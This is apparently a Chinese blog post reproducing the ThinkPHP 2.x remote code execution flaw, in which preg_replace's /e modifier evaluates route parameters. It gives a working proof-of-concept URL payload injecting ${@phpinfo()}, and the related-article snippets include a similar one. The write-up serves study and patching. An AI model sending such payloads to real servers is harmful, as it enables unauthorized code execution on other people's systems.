Thinkphp 2.x rce

最新推荐文章于 2024-12-03 13:03:22 发布
最新推荐文章于 2024-12-03 13:03:22 发布
阅读量982 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 每日漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53086690/article/details/121492565
本文探讨了ThinkPHP 2.x版本中由于 preg_replace 的使用导致的任意代码执行漏洞,详细介绍了漏洞原理、复现方法,并强调了3.0 Lite模式的受影响情况。了解如何避免此类攻击并找到安全修复措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Thinkphp 2.x rce

Thinkphp简介

Thinkphp 是一个开源的,快速、简单的面向对象的轻量级PHP开发框架

漏洞影响版本

Thinkphp 2.x

漏洞概述

ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。

漏洞复现

http://{{BaseUrl}}/index.php?s=/a/a/a/${@phpinfo()}

在这里插入图片描述

thinkphp-2x-rce 代码执行
weixin_46580614的博客
08-20 1109
thinkphp-2x-rce 代码执行 漏洞描述 ​ ThinkPHP框架 - 是由上海顶想公司开发维护的MVC结构的开源PHP框架,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。 ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 影响版本 Thinkphp 2.x的版本 实验环境 攻击机:win10 靶机:vulfocus平台 thinkphp-2x-rce
ThinkPHP 3.2.x RCE漏洞复现
m0_46616663的博客
11-29 2542
打湖湘杯遇到一个类似的willphp题目,都审到cfile了没做出来。。。于是把这个翻出来搞了一波,过程参考了网上别的师傅的0.0 什么是ThinkPHP ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不
ThinkPHP 2.x RCE
weixin_45439731的博客
07-26 404
preg_replace(‘正则规则’,‘替换字符’,‘目标字符’)即:在目标字符中寻找符合正则规则的字符,替换为替换字符,如果此时的正则规则中使用了/e这个修饰符,则存在代码执行漏洞。知识点:/e 修饰符配合preg_replace()函数使用,可以把匹配到的字符串当作正则表达式执行PHP版本在5.2~5.6可以执行,但在PHP>=7时,不支持/e修饰符。
thinkphp-2x-rce 代码执行漏洞复现
weixin_42675091的博客
09-06 479
thinkphp-2x-rce 代码执行漏洞复现
thinkphp 2-rce
weixin_51692662的博客
11-01 580
thinkphp 2-rce
thinkphp-2x-rce 代码执行[VULFOCUS]
m0_37638874的博客
09-08 1071
ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。s=/模块/控制器/操作/[参数名/参数值…http://serverName/index.php(或者其他应用入口文件)/模块/控制器/操作/[参数名/参数值…在ThinkPHP ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由。值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将。
ThinkPHP3.2.x RCE漏洞通报1
08-03
ThinkPHP3.2.x RCE漏洞通报】中提到的安全问题涉及到ThinkPHP 3.2版本的一个严重远程代码执行漏洞。这个漏洞源于框架中的`assign`方法,该方法用于将变量传递给模板进行渲染。当攻击者能够控制`assign`方法的第一...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
ThinkPHP 5.x RCE分析
0verWatch的博客
02-15 6467
第一次进行代码量这么大的分析,记录一下,个人感觉新手真的不适应这种,应该找点小一点的cms去分析,如果不懂MVC架构真的可能会懵。。。 前言 在分析这个之前还看了两篇tp5的RCE漏洞,这两个洞都是很相似的,都是利用一个可控的变量dispatch去实现到最后还是构造出回调函数,可以学习一下,感觉这里面的思路就是本文分析漏洞的来源 https://xz.aliyun.com/t/3845 https...
php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结
weixin_34931142的博客
03-19 1362
一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载:github:https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...
ThinkPHP2.2 完全开发手册.pdf (官方版)
01-18
本完全手册癿内容主要适用亍最新癿ThinkPHP 2.2版本,幵丏大部分内容在2.*版本中同样兼容。2.*版本癿体系架极和2.0版本是保持一致癿,因此对亍以后癿2.*版本,本手册中涉及癿内容基本上可以适用。如有发更,会在最新癿収布版本中注明。
thinkphp-2x-rce 1 代码执行
weixin_51558394的博客
08-17 535
thinkphp-2x-rce 代码执行
ThinkPHP2--RCE漏洞复现
m0_74402888的博客
05-03 1321
var['\1']="\2" 这里双引号引发函数执行,了解为什么${}会执行,在PHP当中,${}是可以构造一个变量的,{}写的是一般的字符,那么就会被当成变量,比如${a}等价于$a,那如果{}写的是一个已知函数名称呢?()值提取匹配的字符串,有几个括号就代表有几个匹配的字符串,看结果我们就知道,我们的目的是将键和值分别提取出来,所有有两个(),一个匹配键,一个匹配值。$a的执行语句执行了(注意如果要实现该代码需要修改php的版本为5.x的版本)s=a/a/a/${phpinfo()} 其中a随意。
thinkphp-2
weixin_34128534的博客
03-06 129
php的跨文件变量? global $g是一个脚本文件中, 函数外部的变量在函数中要使用时的 全局变量 $_GET等是所谓的"超全局变量", 但仍然是只能在一个脚本的范围内使用 要在所有的文件直接都可以使用 的变量 :  $_SESSION $_COOKIE 或者使用数据库 中的表 字段.   读取项目Index中的配置文件? 注意, thinkphp中 使用了大量的 "单字母方法!"...
rce php远程命令执行,漏洞复现-2.x rce-Thinkphp远程命令执行
weixin_36328210的博客
03-23 299
漏洞复现-2.x rce-Thinkphp远程命令执行0x00实验环境攻击机:win10靶机:Ubuntu18 (docker搭建的vulhub靶场)0x01实验引用影响Thinkphp 2.x的版本0x02实验目的学习更多的命令执行姿势,同时了解thinkphp 2.x命令执行的原理0x03实验步骤访问页面,发现是一个Thinkphp的CMS框架,由于是漏洞复现,我们能很清楚的知道它的版本是2....
Thinkphp 2-rce漏洞复现(全过程)
最新发布
2401_87057954的博客
12-03 730
php漏洞复现
thinkphp2-rce远程代码执行漏洞
weixin_45653478的博客
04-27 566
ThinkPHP 2.x版本中,使用的/e模式匹配路由:导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE)漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完全控制权限。 这个漏洞的原因是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值